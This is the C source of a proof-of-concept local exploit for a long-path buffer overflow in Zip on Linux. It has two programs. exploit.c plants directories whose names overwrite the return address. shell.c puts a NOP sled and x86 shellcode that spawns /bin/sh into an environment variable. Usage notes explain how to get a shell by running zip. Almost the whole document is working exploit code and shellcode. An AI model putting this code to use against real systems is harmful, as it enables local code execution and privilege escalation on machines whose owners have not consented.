/*
   Zip/Linux long path buffer overflow 
           proof of concept
   
This vulnerability was found by hexview group.
URL : http://www.hexview.com/docs/20041103-1.txt

This exploit work on local machine, and it spawn a shell.

Usage : first, create an EGG variable with ./shell,
        and then go to an empty directory. Then run
        ./exploit [offset] [buffer_offset], on my machine
        it ./exploit 0 6 work just fine. Then, just
        run zip -r file.zip *, and that's it. You
        will have a shell!

For any comment write on : Rajko <rajkon@gmail.com>

*/


//------------------ exploit.c --------------------

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define BUFFER_SIZE 129
#define OFFSET 0

int main(int argc,char *argv[]){
  char *path,*egg;
  char *byteptr;
  long *ptr,addr;  
  int i,offset,buf_offset;

  printf("Usage : ./exploit [offset] [buffer offset]\n");

  offset=OFFSET;  

  if (argc>1) offset=atoi(argv[1]);      
  if (argc>2) buf_offset=atoi(argv[2]); 
  addr=getenv("EGG")-offset;
  printf("address : 0x%x\n",addr);   
  
  path=malloc(BUFFER_SIZE);
  ptr=(long *)path;
  
  for (i=0; i<BUFFER_SIZE; i+=4)
   *(ptr++)=addr;
  path[BUFFER_SIZE-1]='\0';  

  for (i=0; i<8; i++)
   {          
     mkdir(path,0777);     
     chdir(path);
   }
 
 
  ptr=(long *)path;
  
  for (i=0; i<BUFFER_SIZE-buf_offset; i+=4)
   *(ptr++)=addr;
  path[BUFFER_SIZE-1-buf_offset]='\0';  
  mkdir(path,0777);

  path="..";
  for (i=0; i<8; i++)
    chdir(path);  
}
 
//------------------ end of exploit.c -------------  



//------------------ shell.c ----------------------
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>

#define NOP 0x90
#define EGG_SIZE 1024

char shellcode[]=
"\x31\xc0\x89\xc3\xb0\x17\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";



main(int argc, char *argv[]) {
  int size,i;
  char *egg,*ptr;

  printf("Usage : ./shell [egg_size] {default 1024}\n");

  size=EGG_SIZE;
  if (argc>1) size=atoi(argv[1]);  

  egg=malloc(size);
  ptr=egg;
  for (i=0; i<size-strlen(shellcode)-1; i++)
    *(ptr++)=NOP;
  for (i=0; i<strlen(shellcode); i++)
    *(ptr++)=shellcode[i];
  *ptr='\0';

  memcpy(egg,"EGG=",4);
  putenv(egg);
  system("bash");
}
//----------------- end of shell.c ----------------